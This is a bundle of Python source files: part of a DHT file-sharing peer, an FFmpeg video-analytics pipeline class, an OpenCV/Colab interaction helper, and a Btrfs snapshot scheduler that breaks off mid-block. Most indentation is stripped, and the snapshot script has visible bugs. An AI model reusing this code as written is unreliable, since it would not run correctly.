            self.second_successor = int(received_message)
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
return
def hash_file(self, filename):
return int(filename)%256
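        # Editor's note (hedged): this maps a numeric filename onto the peer id
        # space [0, 255]; e.g. int("2012") % 256 == 220, so file "2012" is stored
        # at (or forwarded towards) peer 220.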
def get_file(self, filename):
with open(filename, "r") as f:
content = f.read()
return content
def save_file(self, peer_with_file, filename):
# Get file from peer and save it locally
message = "get {}".format(filename)
content = self.tcp_request(peer_with_file, message)
with open (str(filename), 'w+') as f:
f.write(content)
self.files.append(filename)
print("File saved")
return
def store_file(self, peer_with_file, filename):
# Store file in network based on hash value
file_peer = self.hash_file(filename)
message = "store {} {}".format(peer_with_file, filename)
if file_peer == self.peer:
print("File Store {} request accepted".format(filename))
self.save_file(peer_with_file, filename)
elif file_peer > self.peer:
# current peer is last peer
if self.first_successor < self.peer:
print("File Store {} request accepted".format(filename))
self.save_file(peer_with_file, filename)
# current peer is second last peer
elif self.second_successor < self.first_successor:
print("File Store {} request forward to my first successor".format(filename))
self.tcp_request(self.first_successor, message)
# store in first successor
elif file_peer <= self.first_successor:
print("File Store {} request forward to my first successor".format(filename))
self.tcp_request(self.first_successor, message)
if file_peer < self.peer and self.first_successor > self.peer:
print("File Store {} request accepted".format(filename))
self.save_file(peer_with_file, filename)
elif file_peer < self.first_successor:
print("File Store {} request forward to my first successor".format(filename))
self.tcp_request(self.first_successor, message)
else:
print("File Store {} request forward to my second successor".format(filename))
self.tcp_request(self.second_successor, message)
return
def request_file(self, peer_requiring_file, filename):
# Find peer with file
message = "request {} {}".format(peer_requiring_file, filename)
file_peer = self.hash_file(filename)
if filename in self.files:
print("File {} is stored here".format(filename))
self.send_file(peer_requiring_file, filename)
else:
print("Request for File {} has been received, but the file is not stored here".format(filename))
self.tcp_request(self.first_successor, message)
return
def save_received_file(self, content):
# Save received file with custom name
filename = time.strftime("received_%y%m%d_%H%M%S")
with open (filename, 'w+') as f:
f.write(content)
self.files.append(filename)
print("File saved")
return
def send_file(self, peer_requiring_file, filename):
# Returns content of file
print("Sending file {} to Peer {}".format(filename, peer_requiring_file))
with open(filename, "r") as f:
content = f.read()
print("The file has been sent")
self.tcp_request(peer_requiring_file, content)
return
def transfer_files(self, condition):
# Transfer files when leaving network
# transfer appropriate files to newly joined peer
if condition=="join":
for filename in self.files:
file_hash = self.hash_file(filename)
if file_hash < self.first_successor and file_hash > self.peer:
self.store_file(self.peer, filename)
# transfer all files to appropriate peer
elif condition=="leave":
for filename in self.files:
message = "store {} {}".format(self.peer, filename)
self.tcp_request(self.first_successor, message)
else:
print("What do you mean {}?".format(condition))
return
def main():
call_type = sys.argv[1]
peer_name = int(sys.argv[2])
if call_type=="init":
first_successor = sys.argv[3]
second_successor = sys.argv[4]
ping_interval = sys.argv[5]
print(call_type, peer_name, first_successor, second_successor, ping_interval)
peer = Peer()
peer.initialise(peer_name, first_successor, second_successor, ping_interval, "all")
elif call_type=="join":
known_peer = int(sys.argv[3])
ping_interval = int(sys.argv[4])
peer = Peer()
peer.peer = peer_name
peer.join_request(peer_name, known_peer, ping_interval)
return
if __name__ == "__main__":
main()
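# Editor's note (hedged): example command lines implied by the argv handling in
# main(); the peer ids, successor ids and ping interval below are illustrative.
#
#   python main.py init 2 4 5 10     # start peer 2 with successors 4 and 5, ping every 10 s
#   python main.py join 7 2 10       # peer 7 joins the DHT via known peer 2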
|
FFmpegPipeline.py
|
'''
* Copyright (C) 2019 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
from modules.Pipeline import Pipeline # pylint: disable=import-error
from modules.PipelineManager import PipelineManager # pylint: disable=import-error
from modules.ModelManager import ModelManager # pylint: disable=import-error
from common.utils import logging # pylint: disable=import-error
import string
import shlex
import subprocess
import time
import copy
from threading import Thread
import shutil
import uuid
import re
logger = logging.get_logger('FFmpegPipeline', is_static=True)
if shutil.which('ffmpeg') is None:
raise Exception("ffmpeg not installed")
class FFmpegPipeline(Pipeline):
GVA_INFERENCE_FILTER_TYPES = ["detect",
"classify"]
DEVICEID_MAP = {2:'CPU',
3:'GPU',
5:'VPU',
6:'HDDL'}
def __init__(self, id, config, models, request):
self.config = config
self.models = models
self.template = config['template']
self.id = id
self._process = None
self.start_time = None
self.stop_time = None
self._ffmpeg_launch_string = None
self.request = request
self.state = "QUEUED"
self.fps = 0
def stop(self):
self.state = "ABORTED"
return self.status()
def params(self):
request = copy.deepcopy(self.request)
if "models" in request:
del(request["models"])
params_obj = {
"id": self.id,
"request": request,
"type": self.config["type"],
"launch_command": self._ffmpeg_launch_string
}
return params_obj
def status(self):
logger.debug("Called Status")
if self.stop_time is not None:
elapsed_time = self.stop_time - self.start_time
elif self.start_time is not None:
elapsed_time = time.time() - self.start_time
else:
elapsed_time = None
status_obj = {
"id": self.id,
"state": self.state,
"avg_fps": self.fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
return status_obj
@staticmethod
def validate_config(config):
pass
def _spawn(self,args):
self.start_time = time.time()
logger.debug(args)
self._process=subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1, universal_newlines=True)
self.state = "RUNNING"
self._process.poll()
while self._process.returncode is None and self.state != "ABORTED":
next_line = self._process.stderr.readline()
fps_idx = next_line.rfind('fps=')
q_idx = next_line.rfind('q=')
if fps_idx != -1 and q_idx != -1:
self.fps = int(float(next_line[fps_idx+4:q_idx].strip()))
self._process.poll()
self.stop_time = time.time()
if self.state == "ABORTED":
self._process.kill()
else:
if self._process.returncode == 0:
self.state = "COMPLETED"
else:
self.state = "ERROR"
PipelineManager.pipeline_finished()
self._process = None
def _add_tags(self, iemetadata_args):
if "tags" in self.request:
try:
for key in self.request["tags"]:
iemetadata_args.append("-custom_tag")
iemetadata_args.append("%s:%s," % (key, self.request["tags"][key]))
if len(iemetadata_args):
# remove final comma
iemetadata_args[-1] = iemetadata_args[-1][:-1]
except Exception:
logger.error("Error adding tags")
def _get_filter_params(self,_filter):
result = {}
params = re.split("=|:",_filter)
result['type'] = params[0]
        for x in range(1, len(params), 2):
result[params[x]] = params[x+1]
return result
def _join_filter_params(self,filter_params):
filter_type = filter_params.pop('type')
parameters = ["%s=%s" %(x,y) for (x,y) in filter_params.items()]
return "{filter_type}={params}".format(filter_type=filter_type,params=':'.join(parameters))
def _add_default_models(self,args):
vf_index = args.index('-vf') if ('-vf' in args) else None
        if vf_index is None:
return
filters = args[vf_index+1].split(',')
new_filters=[]
for _filter in filters:
filter_params = self._get_filter_params(_filter)
if ( (filter_params['type'] in FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES) and
("VA_DEVICE_DEFAULT" in filter_params['model'])):
device="CPU"
if ("device" in filter_params):
device=filter_params["device"]
if isinstance(filter_params['device'],int):
device = FFmpegPipeline.DEVICEID_MAP[int(filter_params['device'])]
filter_params["model"] = ModelManager.get_default_network_for_device(device,filter_params["model"])
new_filters.append(self._join_filter_params(filter_params))
else:
new_filters.append(_filter)
args[vf_index+1] =','.join(new_filters)
def start(self):
logger.debug("Starting Pipeline {id}".format(id=self.id))
self.request["models"] = self.models
self._ffmpeg_launch_string = string.Formatter().vformat(self.template, [], self.request)
args = ['ffmpeg']
args.extend(shlex.split(self._ffmpeg_launch_string))
iemetadata_args = ["-f", "iemetadata", "-source_url", self.request["source"]["uri"]]
self._add_tags(iemetadata_args)
if 'destination' in self.request:
if self.request['destination']['type'] == "kafka":
for item in self.request['destination']['host'].split(','):
iemetadata_args.append("kafka://"+item+"/"+self.request["destination"]["topic"])
elif self.request['destination']['type'] == "file":
iemetadata_args.append(self.request['destination']['path'])
else:
logger.warning("No destination in pipeline request {id}. Results will be discarded.".format(id=self.id))
iemetadata_args.append("/dev/null")
args.extend(iemetadata_args)
self._add_default_models(args)
logger.debug(args)
thread = Thread(target=self._spawn, args=[args])
thread.start()
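# Editor's sketch (hedged): what the filter helpers above do with one -vf entry.
# The filter string is illustrative, not taken from a real pipeline template.
#
#   p = FFmpegPipeline.__new__(FFmpegPipeline)   # helpers need no pipeline state
#   params = p._get_filter_params("detect=model=VA_DEVICE_DEFAULT:device=CPU")
#   # -> {'type': 'detect', 'model': 'VA_DEVICE_DEFAULT', 'device': 'CPU'}
#   p._join_filter_params(params)
#   # -> 'detect=model=VA_DEVICE_DEFAULT:device=CPU'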
|
interact.py
|
import os
import sys
import time
import types
import multiprocessing
import cv2
from tqdm import tqdm
try:
import IPython #if success we are in colab
from IPython.display import display, clear_output
import PIL
import matplotlib.pyplot as plt
is_colab = True
except:
is_colab = False
class InteractBase(object):
EVENT_LBUTTONDOWN = 1
EVENT_LBUTTONUP = 2
EVENT_MBUTTONDOWN = 3
EVENT_MBUTTONUP = 4
EVENT_RBUTTONDOWN = 5
EVENT_RBUTTONUP = 6
EVENT_MOUSEWHEEL = 10
def __init__(self):
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
self.pg_bar = None
def is_colab(self):
return False
    def on_destroy_all_windows(self):
        raise NotImplementedError()
    def on_create_window (self, wnd_name):
        raise NotImplementedError()
    def on_show_image (self, wnd_name, img):
        raise NotImplementedError()
    def on_capture_mouse (self, wnd_name):
        raise NotImplementedError()
    def on_capture_keys (self, wnd_name):
        raise NotImplementedError()
    def on_process_messages(self, sleep_time=0):
        raise NotImplementedError()
    def on_wait_any_key(self):
        raise NotImplementedError()
def log_info(self, msg, end='\n'):
print (msg, end=end)
def log_err(self, msg, end='\n'):
print (msg, end=end)
def named_window(self, wnd_name):
if wnd_name not in self.named_windows:
#we will show window only on first show_image
self.named_windows[wnd_name] = 0
else: print("named_window: ", wnd_name, " already created.")
def destroy_all_windows(self):
if len( self.named_windows ) != 0:
self.on_destroy_all_windows()
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
def show_image(self, wnd_name, img):
if wnd_name in self.named_windows:
if self.named_windows[wnd_name] == 0:
self.named_windows[wnd_name] = 1
self.on_create_window(wnd_name)
if wnd_name in self.capture_mouse_windows:
self.capture_mouse(wnd_name)
self.on_show_image(wnd_name,img)
else: print("show_image: named_window ", wnd_name, " not found.")
def capture_mouse(self, wnd_name):
if wnd_name in self.named_windows:
self.capture_mouse_windows[wnd_name] = True
if self.named_windows[wnd_name] == 1:
self.on_capture_mouse(wnd_name)
else: print("capture_mouse: named_window ", wnd_name, " not found.")
def capture_keys(self, wnd_name):
if wnd_name in self.named_windows:
if wnd_name not in self.capture_keys_windows:
self.capture_keys_windows[wnd_name] = True
self.on_capture_keys(wnd_name)
else: print("capture_keys: already set for window ", wnd_name)
else: print("capture_keys: named_window ", wnd_name, " not found.")
def progress_bar(self, desc, total, leave=True):
if self.pg_bar is None:
self.pg_bar = tqdm( total=total, desc=desc, leave=leave, ascii=True )
else: print("progress_bar: already set.")
def progress_bar_inc(self, c):
if self.pg_bar is not None:
self.pg_bar.n += c
self.pg_bar.refresh()
else: print("progress_bar not set.")
def progress_bar_close(self):
if self.pg_bar is not None:
self.pg_bar.close()
self.pg_bar = None
else: print("progress_bar not set.")
def progress_bar_generator(self, data, desc, leave=True):
for x in tqdm( data, desc=desc, leave=leave, ascii=True ):
yield x
def process_messages(self, sleep_time=0):
self.on_process_messages(sleep_time)
def wait_any_key(self):
self.on_wait_any_key()
def add_mouse_event(self, wnd_name, x, y, ev, flags):
if wnd_name not in self.mouse_events:
self.mouse_events[wnd_name] = []
self.mouse_events[wnd_name] += [ (x, y, ev, flags) ]
def add_key_event(self, wnd_name, ord_key, ctrl_pressed, alt_pressed, shift_pressed):
if wnd_name not in self.key_events:
self.key_events[wnd_name] = []
self.key_events[wnd_name] += [ (ord_key, chr(ord_key), ctrl_pressed, alt_pressed, shift_pressed) ]
def get_mouse_events(self, wnd_name):
ar = self.mouse_events.get(wnd_name, [])
self.mouse_events[wnd_name] = []
return ar
def get_key_events(self, wnd_name):
ar = self.key_events.get(wnd_name, [])
self.key_events[wnd_name] = []
return ar
def input_number(self, s, default_value, valid_list=None, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
i = float(inp)
if (valid_list is not None) and (i not in valid_list):
return default_value
return i
except:
print (default_value)
return default_value
def input_int(self,s, default_value, valid_list=None, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
i = int(inp)
if (valid_list is not None) and (i not in valid_list):
return default_value
return i
except:
print (default_value)
return default_value
def input_bool(self, s, default_value, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
return bool ( {"y":True,"n":False,"1":True,"0":False}.get(inp.lower(), default_value) )
except:
print ( "y" if default_value else "n" )
return default_value
def input_str(self, s, default_value, valid_list=None, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
if (valid_list is not None) and (inp.lower() not in valid_list):
return default_value
return inp
except:
print (default_value)
return default_value
def input_process(self, stdin_fd, sq, str):
sys.stdin = os.fdopen(stdin_fd)
try:
inp = input (str)
sq.put (True)
except:
sq.put (False)
def input_in_time (self, str, max_time_sec):
sq = multiprocessing.Queue()
p = multiprocessing.Process(target=self.input_process, args=( sys.stdin.fileno(), sq, str))
p.start()
t = time.time()
inp = False
while True:
if not sq.empty():
inp = sq.get()
break
if time.time() - t > max_time_sec:
break
p.terminate()
sys.stdin = os.fdopen( sys.stdin.fileno() )
return inp
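    # Editor's note (hedged): illustrative use of input_in_time -- wait at most
    # 10 seconds for the user to press Enter, returning True if they did and
    # False otherwise, without blocking the caller indefinitely:
    #
    #   paused = interact.input_in_time("Press Enter to pause...", 10)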
class InteractDesktop(InteractBase):
def on_destroy_all_windows(self):
cv2.destroyAllWindows()
def on_create_window (self, wnd_name):
cv2.namedWindow(wnd_name)
def on_show_image (self, wnd_name, img):
cv2.imshow (wnd_name, img)
def on_capture_mouse (self, wnd_name):
self.last_xy = (0,0)
def onMouse(event, x, y, flags, param):
(inst, wnd_name) = param
if event == cv2.EVENT_LBUTTONDOWN: ev = InteractBase.EVENT_LBUTTONDOWN
elif event == cv2.EVENT_LBUTTONUP: ev = InteractBase.EVENT_LBUTTONUP
elif event == cv2.EVENT_RBUTTONDOWN: ev = InteractBase.EVENT_RBUTTONDOWN
elif event == cv2.EVENT_RBUTTONUP: ev = InteractBase.EVENT_RBUTTONUP
elif event == cv2.EVENT_MBUTTONDOWN: ev = InteractBase.EVENT_MBUTTONDOWN
elif event == cv2.EVENT_MBUTTONUP: ev = InteractBase.EVENT_MBUTTONUP
elif event == cv2.EVENT_MOUSEWHEEL:
ev = InteractBase.EVENT_MOUSEWHEEL
x,y = self.last_xy #fix opencv bug when window size more than screen size
else: ev = 0
self.last_xy = (x,y)
inst.add_mouse_event (wnd_name, x, y, ev, flags)
cv2.setMouseCallback(wnd_name, onMouse, (self,wnd_name) )
def on_capture_keys (self, wnd_name):
pass
def on_process_messages(self, sleep_time=0):
has_windows = False
has_capture_keys = False
if len(self.named_windows) != 0:
has_windows = True
if len(self.capture_keys_windows) != 0:
has_capture_keys = True
if has_windows or has_capture_keys:
wait_key_time = max(1, int(sleep_time*1000) )
ord_key = cv2.waitKey(wait_key_time)
shift_pressed = False
if ord_key != -1:
if chr(ord_key) >= 'A' and chr(ord_key) <= 'Z':
shift_pressed = True
ord_key += 32
else:
if sleep_time != 0:
time.sleep(sleep_time)
if has_capture_keys and ord_key != -1:
for wnd_name in self.capture_keys_windows:
self.add_key_event (wnd_name, ord_key, False, False, shift_pressed)
def on_wait_any_key(self):
cv2.waitKey(0)
class InteractColab(InteractBase):
def is_colab(self):
return True
def on_destroy_all_windows(self):
pass
#clear_output()
def on_create_window (self, wnd_name):
pass
#clear_output()
def on_show_image (self, wnd_name, img):
pass
# # cv2 stores colors as BGR; convert to RGB
# if img.ndim == 3:
# if img.shape[2] == 4:
# img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGBA)
# else:
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = PIL.Image.fromarray(img)
# plt.imshow(img)
# plt.show()
def on_capture_mouse (self, wnd_name):
pass
#print("on_capture_mouse(): Colab does not support")
def on_capture_keys (self, wnd_name):
pass
#print("on_capture_keys(): Colab does not support")
def on_process_messages(self, sleep_time=0):
time.sleep(sleep_time)
def on_wait_any_key(self):
pass
#print("on_wait_any_key(): Colab does not support")
if is_colab:
interact = InteractColab()
else:
interact = InteractDesktop()
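# Editor's sketch (hedged): typical use of the module-level `interact` object by
# calling code. The window name, `frame` image and quit key are illustrative.
#
#   from interact import interact as io
#   io.named_window("preview")
#   io.capture_keys("preview")
#   while True:
#       io.show_image("preview", frame)      # `frame`: a BGR image array
#       io.process_messages(0.01)
#       keys = io.get_key_events("preview")
#       if any(chr_key == 'q' for _, chr_key, _, _, _ in keys):
#           break
#   io.destroy_all_windows()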
|
conf_snapper.py
|
#!/usr/bin/python
"""
This is a script that runs configuration snapper for Btrfs. Configuration is provided
in a file.
"""
import argparse
import datetime
import json
import logging
import os
import signal
import socket
import sys
import threading
import time
import traceback
# requires installation of schedule
# sudo apt-get -y install python-pip
# sudo pip install apscheduler
from apscheduler.schedulers.blocking import BlockingScheduler
from logging.handlers import RotatingFileHandler
import BtrfsStorage
import SnapshotConfiguration
from SnapshotConfiguration import TimeUnit
log_file_name = 'conf_snapper.log';
log_file = '/var/log/conf_snapper/' + log_file_name;
global_stopper_list = [];
#TODO: change DEBUG to INFO (before full production deployment)
log_level = logging.DEBUG
#Singleton Btrfs storage defined as a snapshot Facade
btrfs = BtrfsStorage.BtrfsStorage()
snapper_status_file = "/var/log/conf_snapper/snapper_status.json"
class StateStatus(object):
up = "up"
down = "down"
suspended = "suspended"
stopped = "stopped"
class State:
status = StateStatus.down;
hasConfigurationError = False;
configurationErrorReason = ""
hasRuntimeError = False;
runtimeErrorReason = ""
def writeStatusJson(self):
logger = logging.getLogger();
json_data_string = {}
json_data_string["status"] = self.status
json_data_string["hasConfigurationError"] = self.hasConfigurationError
json_data_string["hasRuntimeError"] = self.hasRuntimeError
json_data_string["configurationErrorReason"] = self.configurationErrorReason
json_data_string["runtimeErrorReason"] = self.runtimeErrorReason
with open(snapper_status_file, 'w') as outfile:
json.dump(json_data_string, outfile)
logger.info("Writing current status...")
def reset(self):
self.status = StateStatus.down;
self.hasConfigurationError = False;
self.configurationErrorReason = ""
self.hasRuntimeError = False;
self.runtimeErrorReason = ""
state = State()
#------------- Global functions section. Mainly used by scheduler ------------------
# Function returns one snapshot before last. Expects time sorted list in snapshots.
def getPreviousPathToSnapshot(snapshots, snapshot):
logger = logging.getLogger();
snapshot_len = len(snapshots)
logger.debug(snapshots)
if(snapshot_len == 0) :
logger.error("Wrong number of snapshots (%d), 2 is expected, returns None", snapshot_len);
state.hasRuntimeError = True;
state.hasRuntimeError = "Wrong number of snapshots " + snapshot_len + " 2 is expected. Snapshot: " + snappshot.snapshotName;
state.writeStatusJson();
return None
if(snapshot_len > 2) :
logger.error("Wrong number of snapshots (%d), 2 is expected, takes the last %s", snapshot_len, snapshots[-1]);
state.hasRuntimeError = True;
state.hasRuntimeError = "Wrong number of snapshots " + snapshot_len + " 2 is expected, takes the last " + snapshots[-1] + ".Snapshot: " + snappshot.snapshotName;
state.writeStatusJson();
return snapshots[-1]
return snapshots[0]
# Function returns last snapshot. Expects time sorted list in snapshots.
def getLastPathToSnapshot(snapshots, snapshot):
logger = logging.getLogger();
snapshot_len = len(snapshots)
logger.debug(snapshots)
if(snapshot_len == 0) :
logger.error("Wrong number of snapshots (%d), 2 is expected, returns None", snapshot_len);
return None
return snapshots[-1]
#Function creates or updates (remove->create) symbolic link for given snapshot.
def createSymbolicLink(snapshot, snapshotPath):
logger = logging.getLogger();
    if snapshotPath is None:
logger.error("Path is None, do nothing.")
return
snapshotRootPath = btrfs.getSnapshotFolder(snapshot)
fullName = snapshotRootPath + '/' + snapshotPath
symbolicLinkPath = snapshot.snapshotLink;
logger.info("Creating symbolic link '%s' to path '%s", symbolicLinkPath, fullName)
if os.geteuid() != 0:
logger.error("The script was run without root privileges. Symbolic link will not be created.")
else:
if os.path.islink(symbolicLinkPath):
logger.debug("The path %s exist, removing it.", symbolicLinkPath)
os.unlink(symbolicLinkPath)
else:
logger.debug("The path %s does not exist.", symbolicLinkPath)
os.symlink(fullName, symbolicLinkPath)
def isServiceDisabled():
logger = logging.getLogger();
logger.debug("Checking if snapshot should be taken.")
for stopper in global_stopper_list:
if os.path.exists(stopper) == True:
logger.debug("File %s exists!", stopper)
state.status = StateStatus.suspended;
state.writeStatusJson();
return False;
state.status = StateStatus.up
state.writeStatusJson();
return True;
# Creates snapshot according to snapshot configuration.
# Mainly, this function is used by scheduler, but also can be used directly from code.
# The difference between sched and manual call is future link updates which are not created in manual creation.
def takeSnapshot(snapper, snapshot, isManualCall = False):
# self.logger.info("I'm working....")
snapper.logger.info("Snapshot %s will be taken", snapshot.getFullName())
if isServiceDisabled() == False:
snapper.logger.info("Service is disabled, ignoring...");
return;
if btrfs.takeSnapshot(snapshot) == False:
state.hasRuntimeError = True;
state.runtimeErrorReason = "Failed to create snapshot for " + snapshot.getFullName() + " repository";
current_snapshots = btrfs.deleteSnapshot(snapshot)
#assuming all file names are sorted according to creation time.
createSymbolicLink(snapshot, getPreviousPathToSnapshot(current_snapshots, snapshot));
if isManualCall == False:
#add new job for replacing symbolic link to latest one
time_now = int(time.time())
if snapshot.snapshotUnits == TimeUnit.sec:
time_now += (snapshot.snapshotFrequency/2)
elif snapshot.snapshotUnits == TimeUnit.min:
time_now += ((snapshot.snapshotFrequency*60)/2)
elif snapshot.snapshotUnits == TimeUnit.hour:
time_now += ((snapshot.snapshotFrequency*60*60)/2)
elif snapshot.snapshotUnits == TimeUnit.day:
time_now += ((snapshot.snapshotFrequency*60*60*24)/2)
else:
snapper.logger.error("Wrong time unit.")
nextTimeStr = datetime.datetime.fromtimestamp(time_now).strftime("%Y-%m-%d %H:%M:%S")
snapper.logger.debug('nextTimeStr: ' + nextTimeStr)
snapper.sched.add_job(updateSnapshotLink, 'date', run_date=nextTimeStr, args=[current_snapshots, snapshot])
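# Editor's note (hedged): the one-off 'date' job scheduled above moves the
# symbolic link to the newest snapshot half a period after it was taken; e.g.
# frequency 1 with unit 'hour' adds (1*60*60)/2 = 1800 s, so the link is
# updated 30 minutes later.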
# Updates snapshot link scheduled by scheduler.
def updateSnapshotLink(current_snapshots, snapshot):
logger = logging.getLogger();
logger.debug("Going to update symbolic link to latest snapshot.\n")
if isServiceDisabled() == False:
snapper.logger.info("Service is disabled, ignoring...");
return;
createSymbolicLink(snapshot, getLastPathToSnapshot(current_snapshots, snapshot));
# Cleans all jobs and terminates a scheduler.
def shutdown(snapper):
snapper.sched.remove_all_jobs();
snapper.sched.shutdown();
# Global helper for all snapshots cleaning.
# Can be used for manual cleaning as well as Btrfs uninstall.
def delete_all_snapshots_for_all_repositories(snapper):
logger = logging.getLogger();
logger.info("Going to delete all snapshots for all repositories.")
print "Going to delete all snapshots for all repositories.\n";
for snapshot in snapper.configuration:
logger.info("Deleting all snapshots for snapshot %s.\n", snapshot.getFullName())
print "Deleting all snapshots for snapshot " + snapshot.getFullName();
btrfs.deleteSnapshot(snapshot, True);
symbolicLinkPath = snapshot.snapshotLink;
if os.path.islink(symbolicLinkPath):
print "Deleting link " + symbolicLinkPath
logger.info("Deleting link " + symbolicLinkPath)
os.unlink(symbolicLinkPath)
print "Deletion has been finished. For more information please check " + log_file
logger.info("Deletion has been finished. Please check '" + log_file + "' for more information")
#helper function for single process execution.
def get_lock(process_name):
logger = logging.getLogger();
global lock_socket # Without this our lock gets garbage collected
lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
lock_socket.bind('\0' + process_name)
logger.info("I got the lock. I'm a single process.")
except socket.error:
logger.error("There is an another instance of %s is running.", process_name)
print "There is an another instance of '" + process_name + "' is running.", process_name
sys.exit(10)
# --------------------- Snapper section -----------------------------
class Snapper:
configuration = [];
sched = None;
def __init__(self):
# log initialization
self.logger = logging.getLogger()
hdlr = RotatingFileHandler(log_file, maxBytes=1024*1024*20, backupCount=4)
# hdlr2 - used for stdout (system.out).
hdlr2 = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s (%(thread)d) %(levelname)s\t%(funcName)s: %(message)s", "%Y-%m-%d %H:%M:%S")
hdlr.setFormatter(formatter)
hdlr2.setFormatter(formatter)
self.logger.addHandler(hdlr)
#Enable hdlr2 for manual running and logs to system.out.
#self.logger.addHandler(hdlr2)
self.logger.setLevel(log_level)
# default configuration file.
self.conf_file = '/etc/conf_snapper/snapper_conf.json'
self.running = True
#Validation for first time run
    def checkSnapshotOnStartUp(self, snapshot):
symbolicLinkPath = snapshot.snapshotLink;
        if os.path.islink(symbolicLinkPath):
            self.logger.debug("The path %s exists. Nothing to do.", symbolicLinkPath)
            return;
        self.logger.debug("The path %s does not exist on startup, creating first snapshot.", symbolicLinkPath)
takeSnapshot(self, snapshot, True)
# Configuration loader
def config(self, alt_path):
        if alt_path is not None:
self.conf_file = alt_path
self.logger.info("Using configuration file %s", self.conf_file)
with open(self.conf_file) as fh:
self.logger.debug("Loaded conf file.")
json_snapper_configuration = json.load(fh)['snapper_configuration']
repositories = json_snapper_configuration['repositories']
for repository in repositories:
if not repository.get('name'):
self.logger.debug("Name parameter was not fount... continue")
state.hasConfigurationError = True;
state.configurationErrorReason = "Name parameter was not fount...";
continue
for snapshot in repository['snapshot_levels']:
snapshotConf = SnapshotConfiguration.SnapshotConfiguration(repository['name'],
repository['path'],
snapshot['name'],
snapshot['frequency'],
snapshot['link'],
TimeUnit.fromstring(snapshot['unit'])
);
self.logger.debug("%s loaded", snapshotConf.getFullName());
self.logger.debug(snapshotConf);
if btrfs.checkRepository(snapshotConf.repositoryPath) == False:
self.logger.error("Repository path (%s) is not valid Btrfs folder", snapshotConf.repositoryPath)
state.hasConfigurationError = True;
state.configurationErrorReason = "Repository path " + snapshotConf.repositoryPath + " is not valid Btrfs folder";
continue
else:
self.logger.debug("Repository path (%s) is valid Btrfs folder", snapshotConf.repositoryPath)
if snapshotConf.snapshotLink == "":
self.logger.error("Repository link (%s) is empty", snapshotConf.snapshotLink)
state.hasConfigurationError = True;
state.configurationErrorReason = "Repository link is empty.";
else:
self.configuration.append(snapshotConf);
try:
stoppers = json_snapper_configuration['stoppers']
for stopper in stoppers:
global_stopper_list.append(stopper)
except Exception, err:
state.hasConfigurationError = True;
state.configurationErrorReason = "Stopper section does not exist. - " + traceback.format_exc();
logger.error("\n Stopper section does not exist. - %s\n" % traceback.format_exc())
def startSecJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', second=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName())
def startMinJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', minute=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName() )
def startHourJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', hour=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName() )
def startDayJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', day=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName() )
def start(self):
try:
# apscheduler::BlockingScheduler initialization.
self.sched = BlockingScheduler();
for snapshotConf in self.configuration:
#Take snapshots on startup
                self.checkSnapshotOnStartUp(snapshotConf);
switcher = {
TimeUnit.sec: self.startSecJob,
TimeUnit.min: self.startMinJob,
TimeUnit.hour: self.startHourJob,
TimeUnit.day: self.startDayJob,
}
expression = '*/' + str(snapshotConf.snapshotFrequency)
func = switcher.get(snapshotConf.snapshotUnits)
#add takeSnapshot job.
func(takeSnapshot, expression, snapshotConf)
self.sched.start()
except Exception, err:
state.status = StateStatus.down;
state.hasRuntimeError = True;
state.configurationErrorReason = "Failed to start with exception: " + traceback.format_exc();
state.writeStatusJson();
sys.exit("\nFailed to start - %s\n" % traceback.format_exc())
def set_signal_handling(self, sig, frame):
logger = logging.getLogger();
#SIGINT for Ctrl+C.
#SIGTERM for stop/start service.
if sig == signal.SIGTERM or sig == signal.SIGINT:
print "Got a termination signal. Exiting..."
self.running = False
self.logger.info("Got a termination signal")
            if self.sched is not None:
logger.debug("Stopping the scheduler...")
shutdown(self);
else:
logger.debug("self or sched is NONE")
state.status = StateStatus.stopped;
state.runtimeErrorReason = "Got a termination signal.";
state.writeStatusJson();
def printConfiguration(self):
print "Snapper configuration:"
for conf in self.configuration:
print conf
# -------------------- Main Section ------------------------
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Snapshot manager for Btrfs')
parser.add_argument('-c','--check',
help='Check configuration file.',
action='store_true',
dest='is_check')
parser.add_argument('-d','--delete-all',
help='Deletes all snapshots.',
action='store_true',
dest='is_delete')
parser.add_argument('configuration_file',
metavar='<configuration_file_path>',
type=argparse.FileType('r'),
nargs='?',
help='configuration file path')
args = parser.parse_args()
    configuration_file = args.configuration_file
is_check_configuration = args.is_check
is_snapshots_delete = args.is_delete
try:
# user root validation.
if os.geteuid() != 0:
log_file = log_file_name;
sys.exit("\nOnly root user can run this script\n")
snapper = Snapper();
logger = logging.getLogger();
get_lock('conf_snapper')
try:
            if configuration_file is not None:
                snapper.config(configuration_file.name)
else:
snapper.config(None)
# snapper.config('snapper_conf.json')
if args.is_check:
snapper.printConfiguration();
sys.exit(0);
except Exception, err:
